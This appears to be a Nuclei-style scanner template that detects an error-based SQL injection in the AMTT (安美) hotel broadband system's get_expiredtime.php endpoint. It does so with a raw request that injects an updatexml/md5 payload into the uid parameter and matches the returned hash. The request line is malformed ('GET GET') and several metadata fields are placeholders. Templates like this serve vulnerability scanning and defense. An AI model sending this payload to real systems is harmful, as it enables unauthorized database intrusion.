id: amtt-hiboss-get_expiredtime-sqli
info:
  name: 安美数字酒店宽带运营系统SQL注入
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://vip.bdziyi.com/59715/
  classification:
    cve-id: 
  metadata:
    verified: true/false
    fofa-query: demo
    tips:
    repair:
    version:
  tags: amtt,sqli,time

http:
  - raw:
      - |
        GET GET /user/portal/get_expiredtime.php?uid=1\%27%20and%20updatexml(1,concat(0x7e,(md5(1))),3)--%20q HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'c4ca4238a0b923820dcc')
        condition: and